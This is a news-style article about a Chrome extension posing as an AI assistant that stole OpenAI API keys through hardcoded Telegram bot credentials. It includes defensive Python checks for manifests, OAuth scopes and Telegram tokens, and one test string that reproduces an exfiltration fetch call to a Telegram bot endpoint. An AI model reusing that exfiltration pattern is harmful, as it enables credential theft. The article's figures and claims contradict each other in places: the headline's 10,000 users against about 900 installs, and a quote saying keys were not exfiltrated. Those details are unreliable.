Chrome Extension Posing as AI Assistant Exposes 10K+ Users’ OpenAI API Keys in Major Security Breach

Another day, another digital heist—only this time, the thieves didn't need to pick a lock. They just asked politely.
Security researchers just uncovered a malicious Chrome extension masquerading as a helpful AI assistant. Its real job? Harvesting OpenAI API keys from over 10,000 unsuspecting users. The extension slipped past Google's defenses, promising productivity while quietly vacuuming up credentials.
How the Scam Worked
The extension presented itself as a legitimate tool, a common sidekick for developers and writers tapping into ChatGPT's power. Once installed, it operated silently in the background. Every time a user authenticated with OpenAI, the extension captured their unique API key—the digital equivalent of a credit card number for AI services—and sent it to a remote server controlled by the attackers.
The Fallout for Users
An exposed API key is a blank check. Attackers can use it to rack up massive bills on the victim's account, potentially costing thousands in unauthorized usage fees. Beyond the financial hit, the keys can be used to access sensitive data from previous interactions or to impersonate the user in other integrated services.
The Bigger Picture: Trust in the Extension Ecosystem
This breach cuts deep because it exploits trust. The Chrome Web Store is a gateway for millions, yet its vetting process failed to catch this wolf in sheep's clothing. It highlights a systemic vulnerability: our reliance on third-party tools to access powerful, paid platforms. Security often becomes an afterthought in the rush for convenience.
OpenAI's response has been standard—revoke compromised keys and advise users to monitor their usage. But the onus remains on the individual to spot fraudulent activity, a classic case of 'privatized profits, socialized risk.' It's the cybersecurity version of a bank telling you to guard your vault with a padlock after they left the front door open.
One cynical finance jab? This is just a more sophisticated version of phishing. Instead of promising a Nigerian prince's fortune, it promised artificial intelligence. The returns, however, were very real for the attackers, funded directly by their victims' API credits. In the crypto world, we call that a rug pull. In the SaaS world, they call it a feature.
The lesson is painfully clear. In the gold rush to integrate AI, basic security hygiene is getting buried. Always vet your extensions, use unique API keys with strict limits, and remember: if a tool is free, you might be the product—or in this case, the funding round.
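The "vet your extensions" advice can be made concrete. The sketch below checks a Chrome extension's manifest for declared permissions that deserve a second look before installing. The permission names are real Chrome API permissions; the choice of which ones to treat as "risky" is an illustrative heuristic of ours, not an official Google classification, and the sample manifest is hypothetical.

```python
# Heuristic watchlist of Chrome extension permissions that warrant scrutiny.
# The names are real Chrome permissions; grouping them as "risky" is an
# illustrative assumption, not an official classification.
RISKY_PERMISSIONS = {"cookies", "webRequest", "history", "tabs"}

def audit_manifest(manifest: dict) -> list[str]:
    """Return human-readable warnings for a Chrome extension manifest dict."""
    warnings = []
    declared = set(manifest.get("permissions", []))
    for perm in sorted(declared & RISKY_PERMISSIONS):
        warnings.append(f"sensitive permission requested: {perm}")
    # In Manifest V3, host patterns live under host_permissions.
    for pattern in manifest.get("host_permissions", []):
        if pattern == "<all_urls>" or pattern.endswith("://*/*"):
            warnings.append(f"can read/modify every site: {pattern}")
    return warnings

# Hypothetical manifest resembling an over-permissioned "AI assistant" extension.
sample = {
    "name": "Example Chat Assistant",
    "permissions": ["storage", "cookies"],
    "host_permissions": ["<all_urls>"],
}
for warning in audit_manifest(sample):
    print("WARNING:", warning)
```

A chat sidebar rarely needs `<all_urls>` access or cookie permissions; when the manifest asks for more than the advertised feature requires, that mismatch is the warning sign.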
Chrome extension poses privacy and security risks to OpenAI users
According to Obsidian Security, the software was initially released under the name ChatGPT Extension before being rebranded as H-Chat Assistant. Users who installed the extension were asked to supply their own OpenAI API key to activate chatbot features.
After receiving the key, the extension largely functioned as advertised, enabling conversations with AI models directly in the browser. That apparent legitimacy led users to trust the tool, but according to Obsidian's analysts, hidden data flows were running in the background.
“Although these extensions are not actively exfiltrating API keys, user prompts, and other data are being quietly sent to third-party/external servers. Several of the extensions impersonate ChatGPT, creating a false sense of trust that conversations and data are only being transmitted to OpenAI,” the analysts explained.
However, Obsidian said the actual theft takes place when a user deletes a chat or chooses to log out of the application. At that moment, the key is transmitted using hardcoded Telegram bot credentials embedded in the extension’s code.
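Hardcoded Telegram bot credentials are a grep-friendly indicator of compromise: bot tokens commonly follow a documented shape of a numeric bot ID, a colon, and a 35-character secret drawn from letters, digits, `-`, and `_`. The minimal scanner below looks for that pattern in extension source; the token and the `fetch` snippet are fabricated for illustration.

```python
import re

# Telegram bot tokens commonly look like "<numeric bot id>:<35-char secret>",
# with the secret drawn from [A-Za-z0-9_-]. The bounds here are a heuristic.
TOKEN_RE = re.compile(r"\d{8,10}:[A-Za-z0-9_-]{35}")

def find_telegram_tokens(source_code: str) -> list[str]:
    """Scan JavaScript source text for strings shaped like Telegram bot tokens."""
    return TOKEN_RE.findall(source_code)

# Hypothetical snippet resembling the exfiltration call described in the report.
snippet = (
    'fetch("https://api.telegram.org/bot123456789:'
    'AAAAABBBBBCCCCCDDDDDEEEEEFFFFFGGGGG/sendMessage", {method: "POST"})'
)
print(find_telegram_tokens(snippet))
# → ['123456789:AAAAABBBBBCCCCCDDDDDEEEEEFFFFFGGGGG']
```

A hit in a browser extension's bundled JavaScript is a strong red flag, since legitimate extensions have no reason to ship Telegram bot credentials.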
H-Chat Assistant was also requesting read and write permissions for Google’s services, which investigators believe could expose data stored in victims’ Google Drive accounts.
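Those Google permissions would surface in the extension's `oauth2.scopes` declaration. The sketch below checks a manifest for Drive-related scopes; the scope URLs are Google's published Drive API scopes, while the manifest itself is a fabricated example.

```python
import json

# Google Drive OAuth scopes, per Google's published scope list.
DRIVE_SCOPES = {
    "https://www.googleapis.com/auth/drive",           # full read/write access
    "https://www.googleapis.com/auth/drive.readonly",  # read-only access
    "https://www.googleapis.com/auth/drive.file",      # per-file access
}

def drive_scopes_requested(manifest_json: str) -> set[str]:
    """Return any Drive scopes declared in a Chrome extension manifest."""
    manifest = json.loads(manifest_json)
    scopes = set(manifest.get("oauth2", {}).get("scopes", []))
    return scopes & DRIVE_SCOPES

# Fabricated manifest for illustration only.
sample_manifest = json.dumps({
    "name": "suspicious-extension",
    "oauth2": {
        "client_id": "example.apps.googleusercontent.com",
        "scopes": ["https://www.googleapis.com/auth/drive"],
    },
})
print(drive_scopes_requested(sample_manifest))
```

A non-empty result is a cue to ask why a chat assistant needs access to your Drive files at all.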
Obsidian’s security researchers believe the malicious activity began in July 2024 and went unnoticed for months, while users continued installing and using the tool. On January 13, 2025, they discovered the activity and reported it to OpenAI through disclosure channels.
That same day, OpenAI revoked the compromised API keys to curb the app's misuse. Even after the disclosure and revocations, the extension was still available in the Chrome Web Store, according to Obsidian's report.
H-Chat Assistant is part of a malicious toolset
At least 16 Chrome extensions promising AI-related productivity enhancements appear to share the same developer fingerprints. These tools are believed to have been built by a single threat actor who is harvesting credentials and session data.
According to findings cited by researchers, the 16 extensions’ downloads were relatively low, totaling about 900 installations. Still, analysts say the tactic is concerning because of its scalability and the popularity of AI add-ons on browsers.
“GPT Optimizers are popular, and there are enough highly-rated, legitimate ones on the Chrome Web Store that people could easily miss any warning signs. One of the variants has a featured logo that states it follows recommended practices for Chrome extensions,” LayerX Security consultant Natalie Zargarov wrote in a report published on Monday.
Zargarov added that these extensions require deep integration with authenticated web applications, creating a "materially expanded browser attack surface." The malicious extensions exploit weaknesses in web-based authentication processes used by ChatGPT-related services.
“Of the 16 identified extensions in this campaign, 15 were distributed through the Chrome Web Store, while one extension was published via the Microsoft Edge Add-ons marketplace,” the researcher explained.
Extension sends metadata and client identifiers, researcher finds
In her analysis, the LayerX consultant found that the extensions were sending more than just API keys: they transmitted extension metadata, including version details, language settings, and client identifiers.
It also sent usage telemetry, event data, and backend-issued access tokens tied to the extension’s services. These combined data points enable attackers to expand token privileges, track users in sessions, and build behavioral profiles.
Zargarov noted that downloads were small compared with GhostPoster, which surpassed 830,000 installations, and Roly Poly VPN, which exceeded 31,000. Still, she cautioned that AI-focused tools could quickly surge in popularity.
“It just takes one iteration for a malicious extension to become popular. We believe that GPT optimizers will soon become as popular as ([if] not more than) VPN extensions,” she wrote.